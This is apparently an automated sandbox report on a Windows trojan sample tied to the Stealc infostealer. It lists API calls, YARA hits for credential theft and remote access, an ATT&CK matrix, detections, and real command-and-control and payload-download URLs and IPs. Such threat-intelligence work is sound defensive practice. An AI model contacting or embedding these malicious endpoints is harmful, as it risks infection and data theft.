                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00417850
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00417A30
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
                    Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.b00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.9B3F.tmp.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.b00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.9B3F.tmp.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Source: Yara match | File source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.b00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.9B3F.tmp.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.9B3F.tmp.exe.b00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.9B3F.tmp.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_04850E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_04850E7D
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_04851B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_04851B53
                    MITRE ATT&CK Matrix (numbers in parentheses are the per-technique counts shown in the report)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (13) | DLL Side-Loading (1) | Process Injection (111) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (21) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (11) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Clipboard Data (3) | Ingress Tool Transfer (12) | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Security Software Discovery (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (111) | NTDS | Virtualization/Sandbox Evasion (11) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Process Discovery (11) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (22) | DCSync | Account Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | File and Directory Discovery (2) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Information Discovery (134) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Initial sample
Source | Detection | Scanner | Label | Link
TP77MvSzt2.exe | 47% | ReversingLabs | Win32.Trojan.CrypterX |
TP77MvSzt2.exe | 100% | Avira | HEUR/AGEN.1312567 |
TP77MvSzt2.exe | 100% | Joe Sandbox ML | |

Dropped files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | 100% | Joe Sandbox ML | |

Unpacked PE files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
http://upx.sf.net | 0% | URL Reputation | safe |
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 104.21.56.70 | true | false | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.177/edd20096ecef326d.php | true | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | unknown
http://62.204.41.177/ | true | | unknown
URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE | TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exen | TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub= | TP77MvSzt2.exe | false | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE# | TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.php:Ic | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exeu | TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.php~I | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE | TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEO | TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/ | TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.php_JP | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | URL Reputation: safe | unknown
http://62.204.41.177/edd20096ecef326d.phpBH | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpNH | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177;ah | 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe | TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/ows | 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177 | 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://62.204.41.177/% | 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.37 | unknown | Russian Federation | 49505 | SELECTELRU | false
62.204.41.177 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1542870
                                                                Start date and time:2024-10-26 19:07:18 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:TP77MvSzt2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:1e1e32d1eedb37a1e3c1ad488621b26f.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 50
                                                                • Number of non-executed functions: 372
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: TP77MvSzt2.exe
Time | Type | Description
13:08:21 | API Interceptor | 8727932x Sleep call for process: TP77MvSzt2.exe modified
13:10:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.113.115.37 | jicQJ2cdlM.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | w12rykWq2L.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | jWpgP22dl2.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | mCe4hBfqCT.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37/ScreenUpdateSync.exe
62.204.41.177 | 1vYjXDbKHt.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | 716b3c89802c1713871667444720e62f3fc064c9910a1.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | oqIz1tfl5h.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | jicQJ2cdlM.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | w12rykWq2L.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | jWpgP22dl2.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | mCe4hBfqCT.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
104.21.56.70 | jicQJ2cdlM.exe | malicious | Stealc |
104.21.56.70 | jWpgP22dl2.exe | malicious | Stealc |
104.21.56.70 | mCe4hBfqCT.exe | malicious | Stealc |
104.21.56.70 | BKoQ3DF8eD.exe | malicious | Stealc |
104.21.56.70 | v2hvYA53Ys.exe | malicious | Stealc |
104.21.56.70 | Zl5QaBwsTJ.exe | malicious | Stealc |
104.21.56.70 | VAIIBIHmtT.exe | malicious | Stealc |
104.21.56.70 | hlyG1m5UmO.exe | malicious | Stealc, Vidar |

Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
post-to-me.com | jicQJ2cdlM.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | w12rykWq2L.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | jWpgP22dl2.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | mCe4hBfqCT.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | BKoQ3DF8eD.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | v2hvYA53Ys.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | Zl5QaBwsTJ.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | sgM0Akbldk.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | VAIIBIHmtT.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 172.67.179.207

Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | ZnPyVAOUBc.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | jicQJ2cdlM.exe | malicious | Stealc | 104.21.56.70
CLOUDFLARENETUS | http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG | malicious | Unknown | 172.67.189.243
CLOUDFLARENETUS | http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG | malicious | Unknown | 172.67.189.243
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.170.64
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENETUS | w12rykWq2L.exe | malicious | Stealc | 172.67.179.207
SELECTELRU | jicQJ2cdlM.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | w12rykWq2L.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | jWpgP22dl2.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | mCe4hBfqCT.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | la.bot.sh4.elf | malicious | Unknown | 92.53.102.17
TNNET-ASTNNetOyMainnetworkFI | 1vYjXDbKHt.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | 716b3c89802c1713871667444720e62f3fc064c9910a1.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | oqIz1tfl5h.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | jicQJ2cdlM.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | w12rykWq2L.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | jWpgP22dl2.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | mCe4hBfqCT.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177

Context: JA3 fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | jicQJ2cdlM.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exe | malicious | Stealc, Vidar | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | w12rykWq2L.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | jWpgP22dl2.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | 1GeaC4QnFy.dll | malicious | CobaltStrike | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | OyPpyRRqd8.dll | malicious | CobaltStrike | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | mCe4hBfqCT.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | H33UCslPzv.exe | malicious | XWorm | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | factura Fvsae2400398241025.pdf.exe | malicious | FormBook, GuLoader | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe | malicious | Unknown | 104.21.56.70
                                                                                No context
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):0.9641649851616958
                                                                                Encrypted:false
                                                                                SSDEEP:192:YA20mV0n/m0jMhZrMZtzuiFCZ24IO89e:lNm2n/m0jjTzuiFCY4IO89
                                                                                MD5:BFD14B77AD7279CB5AF748E873BBDCCF
                                                                                SHA1:28C8A424B9376608FE64F8406CAB910B2567489F
                                                                                SHA-256:FEB72D988EBBBC92E9C3C6173631E94EFCF7D4196BB7D33C0D84B032AEAAA6F2
                                                                                SHA-512:E91633AA1DE57E1B40C4391EC4640A00A286992450E495B4547D66F030062BB34DD8FD7C7B54217856A86824EA940E7AF170DE1DAE2BB0B48B467A21AC177E91
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.4.6.6.8.1.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.5.6.2.1.2.7.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.f.0.3.1.7.1.-.0.e.e.3.-.4.1.f.c.-.b.5.f.a.-.9.8.8.3.1.1.9.b.c.3.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.8.b.a.5.1.1.-.f.c.a.0.-.4.3.8.d.-.a.b.3.9.-.d.4.4.7.8.3.4.b.d.a.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.B.3.F...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.4.-.3.a.d.7.-.9.4.a.b.c.9.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.c.4.c.f.4.0.9.f.3.a.b.3.c.0.0.6.3.9.5.d.6.e.3.7.5.d.d.5.d.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.5.f.7.b.1.8.9.5.b.d.9.7.b.6.c.f.c.b.9.a.a.0.c.5.e.8.3.d.e.9.f.b.4.2.4.c.b.b.0.!.9.B.3.F...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:08:35 2024, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):60594
                                                                                Entropy (8bit):1.925002194682353
                                                                                Encrypted:false
                                                                                SSDEEP:384:eZdPBFE5EEBboppOwUSBVPPbX/iGghWT7Z:e3B8EEBEppOhSfLqG3
                                                                                MD5:939D8378315D223B4A80F494676C5750
                                                                                SHA1:99E93186634AFFA13981A5062C7995FC97A829F0
                                                                                SHA-256:B5B78B4468E3952B1AB2CCA04F3FB93A2C368F64AA028EC7B9EB2C7936F267FA
                                                                                SHA-512:A2882B66D1AF857A5AA32D94269A6AB79B46B57E362078DDD923A7FF88D5986F3E39320ACD13900FC310C0A0AD0C611A348DE8E530EFD6C7E0700D89446B64AD
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T.......@....".g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8314
                                                                                Entropy (8bit):3.6946176089572615
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJ9G6ZndU6Yni6sgmf3ipDQ89bbnsf0xJm:R6lXJs6Zn+6Yi6sgmf3Cbsfb
                                                                                MD5:9F581135A5B7E48D9540646C158FB514
                                                                                SHA1:08EAB1ED1FF53CFB18D28375E8E30B186217D2EA
                                                                                SHA-256:68E41EEEE680BAC3607A115EF5F7CDF296B4C845604EB7F861D8383220E615B8
                                                                                SHA-512:E006ED25B7685AF3D595E926102CEC70F27253DE74F8B3733A7192F2E84BDE0D05351700FA6E2804A35F16A82784CFD86B911CE358181C85D1BECA8998420196
                                                                                Malicious:false
                                                                                Reputation:low
